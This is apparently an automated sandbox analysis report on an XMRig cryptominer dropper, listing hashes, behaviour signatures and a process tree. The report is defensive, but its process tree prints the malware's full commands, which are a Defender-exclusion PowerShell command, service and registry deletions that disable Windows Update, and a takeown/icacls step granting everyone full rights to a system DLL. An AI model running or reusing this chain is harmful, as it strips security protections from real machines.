Analysis
-
max time kernel
152s -
max time network
127s -
platform
windows10-1703_x64 -
resource
win10-20220722-en -
resource tags
arch:x64arch:x86image:win10-20220722-enlocale:en-usos:windows10-1703-x64system -
submitted
11-08-2022 22:16
Static task
static1
General
-
Target
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe
-
Size
5.0MB
-
MD5
c7ad8aff4b9bcaaf8362bc46dbb335bd
-
SHA1
6da9bd46beba784cde7bce3d73963567c9efb9b0
-
SHA256
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
-
SHA512
e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/4540-440-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/4540-441-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/4540-442-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/4540-444-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/4540-451-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
gsd5432.exepid process 2680 gsd5432.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4892 takeown.exe 3140 icacls.exe 868 takeown.exe 68 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4892 takeown.exe 3140 icacls.exe 868 takeown.exe 68 icacls.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.exegsd5432.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gsd5432.exe.log gsd5432.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
gsd5432.exedescription pid process target process PID 2680 set thread context of 4540 2680 gsd5432.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.exegsd5432.exedescription ioc process File created C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe powershell.exe File opened for modification C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys gsd5432.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4880 sc.exe 3472 sc.exe 4248 sc.exe 760 sc.exe 3128 sc.exe 3608 sc.exe 3032 sc.exe 3688 sc.exe 4060 sc.exe 1940 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.exegsd5432.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" gsd5432.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3188 reg.exe 5108 reg.exe 3108 reg.exe 1552 reg.exe 2344 reg.exe 4216 reg.exe 644 reg.exe 1296 reg.exe 428 reg.exe 3340 reg.exe 568 reg.exe 2904 reg.exe 4720 reg.exe 1316 reg.exe 5080 reg.exe 2248 reg.exe 5032 reg.exe 732 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exepowershell.exepowershell.EXEpowershell.exegsd5432.exesvchost.exepid process 4812 powershell.exe 4812 powershell.exe 4812 powershell.exe 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 404 powershell.EXE 404 powershell.EXE 404 powershell.EXE 4632 powershell.exe 4632 powershell.exe 4632 powershell.exe 2680 gsd5432.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 628 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exepowershell.exedescription pid process Token: SeDebugPrivilege 4812 powershell.exe Token: SeIncreaseQuotaPrivilege 4812 powershell.exe Token: SeSecurityPrivilege 4812 powershell.exe Token: SeTakeOwnershipPrivilege 4812 powershell.exe Token: SeLoadDriverPrivilege 4812 powershell.exe Token: SeSystemProfilePrivilege 4812 powershell.exe Token: SeSystemtimePrivilege 4812 powershell.exe Token: SeProfSingleProcessPrivilege 4812 powershell.exe Token: SeIncBasePriorityPrivilege 4812 powershell.exe Token: SeCreatePagefilePrivilege 4812 powershell.exe Token: SeBackupPrivilege 4812 powershell.exe Token: SeRestorePrivilege 4812 powershell.exe Token: SeShutdownPrivilege 4812 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeSystemEnvironmentPrivilege 4812 powershell.exe Token: SeRemoteShutdownPrivilege 4812 powershell.exe Token: SeUndockPrivilege 4812 powershell.exe Token: SeManageVolumePrivilege 4812 powershell.exe Token: 33 4812 powershell.exe Token: 34 4812 powershell.exe Token: 35 4812 powershell.exe Token: 36 4812 powershell.exe Token: SeShutdownPrivilege 3596 powercfg.exe Token: SeCreatePagefilePrivilege 3596 powercfg.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeCreatePagefilePrivilege 1948 powercfg.exe Token: SeShutdownPrivilege 1952 powercfg.exe Token: SeCreatePagefilePrivilege 1952 powercfg.exe Token: SeShutdownPrivilege 3612 powercfg.exe Token: SeCreatePagefilePrivilege 3612 powercfg.exe Token: SeTakeOwnershipPrivilege 4892 takeown.exe Token: SeDebugPrivilege 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeIncreaseQuotaPrivilege 1916 powershell.exe Token: SeSecurityPrivilege 1916 powershell.exe Token: SeTakeOwnershipPrivilege 1916 powershell.exe Token: SeLoadDriverPrivilege 1916 powershell.exe Token: SeSystemProfilePrivilege 1916 powershell.exe Token: SeSystemtimePrivilege 1916 powershell.exe Token: SeProfSingleProcessPrivilege 1916 powershell.exe Token: SeIncBasePriorityPrivilege 1916 powershell.exe Token: SeCreatePagefilePrivilege 1916 powershell.exe Token: SeBackupPrivilege 1916 powershell.exe Token: SeRestorePrivilege 1916 powershell.exe Token: SeShutdownPrivilege 1916 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeSystemEnvironmentPrivilege 1916 powershell.exe Token: SeRemoteShutdownPrivilege 1916 powershell.exe Token: SeUndockPrivilege 1916 powershell.exe Token: SeManageVolumePrivilege 1916 powershell.exe Token: 33 1916 powershell.exe Token: 34 1916 powershell.exe Token: 35 1916 powershell.exe Token: 36 1916 powershell.exe Token: SeIncreaseQuotaPrivilege 1916 powershell.exe Token: SeSecurityPrivilege 1916 powershell.exe Token: SeTakeOwnershipPrivilege 1916 powershell.exe Token: SeLoadDriverPrivilege 1916 powershell.exe Token: SeSystemProfilePrivilege 1916 powershell.exe Token: SeSystemtimePrivilege 1916 powershell.exe Token: SeProfSingleProcessPrivilege 1916 powershell.exe Token: SeIncBasePriorityPrivilege 1916 powershell.exe Token: SeCreatePagefilePrivilege 1916 powershell.exe Token: SeBackupPrivilege 1916 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.execmd.execmd.execmd.exepowershell.EXEdescription pid process target process PID 4120 wrote to memory of 4812 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe powershell.exe PID 4120 wrote to memory of 4812 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe powershell.exe PID 4120 wrote to memory of 4052 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4120 wrote to memory of 4052 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4120 wrote to memory of 3468 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4120 wrote to memory of 3468 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4052 wrote to memory of 1940 4052 cmd.exe sc.exe PID 4052 wrote to memory of 1940 4052 cmd.exe sc.exe PID 3468 wrote to memory of 3596 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 3596 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 1948 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 1948 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 1952 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 1952 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 3612 3468 cmd.exe powercfg.exe PID 3468 wrote to memory of 3612 3468 cmd.exe powercfg.exe PID 4052 wrote to memory of 3032 4052 cmd.exe sc.exe PID 4052 wrote to memory of 3032 4052 cmd.exe sc.exe PID 4052 wrote to memory of 3688 4052 cmd.exe sc.exe PID 4052 wrote to memory of 3688 4052 cmd.exe sc.exe PID 4052 wrote to memory of 3608 4052 cmd.exe sc.exe PID 4052 wrote to memory of 3608 4052 cmd.exe sc.exe PID 4052 wrote to memory of 4880 4052 cmd.exe sc.exe PID 4052 wrote to memory of 4880 4052 cmd.exe sc.exe PID 4052 wrote to memory of 5032 4052 cmd.exe reg.exe PID 4052 wrote to memory of 5032 4052 cmd.exe reg.exe PID 4052 wrote to memory of 4216 4052 cmd.exe reg.exe PID 4052 wrote to memory of 4216 4052 cmd.exe reg.exe PID 4052 wrote to memory of 732 4052 cmd.exe reg.exe PID 4052 wrote to memory of 732 4052 cmd.exe reg.exe PID 4052 wrote to memory of 2904 4052 cmd.exe reg.exe PID 4052 wrote to memory of 2904 4052 cmd.exe reg.exe PID 4052 wrote to memory of 3108 4052 cmd.exe reg.exe PID 4052 wrote to memory of 3108 4052 cmd.exe reg.exe PID 4052 wrote to memory of 4892 4052 cmd.exe takeown.exe PID 4052 wrote to memory of 4892 4052 cmd.exe takeown.exe PID 4052 wrote to memory of 3140 4052 cmd.exe icacls.exe PID 4052 wrote to memory of 3140 4052 cmd.exe icacls.exe PID 4120 wrote to memory of 1916 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe powershell.exe PID 4120 wrote to memory of 1916 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe powershell.exe PID 4120 wrote to memory of 4548 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4120 wrote to memory of 4548 4120 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe cmd.exe PID 4548 wrote to memory of 4512 4548 cmd.exe choice.exe PID 4548 wrote to memory of 4512 4548 cmd.exe choice.exe PID 4052 wrote to memory of 4720 4052 cmd.exe reg.exe PID 4052 wrote to memory of 4720 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1316 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1316 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1552 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1552 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1296 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1296 4052 cmd.exe reg.exe PID 4052 wrote to memory of 1484 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 1484 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2516 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2516 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 3704 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 3704 4052 cmd.exe schtasks.exe PID 404 wrote to memory of 2680 404 powershell.EXE gsd5432.exe PID 404 wrote to memory of 2680 404 powershell.EXE gsd5432.exe PID 4052 wrote to memory of 2356 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2356 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 4308 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 4308 4052 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe"C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1940 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3032 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3688 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3608 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4880 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:5032 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:4216 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:732 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:2904 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:3108 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4892 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3140 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:4720 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1316 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1552 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1296 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:1484
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:2516
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:3704
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:2356
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:4308
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:1832
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:4304
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
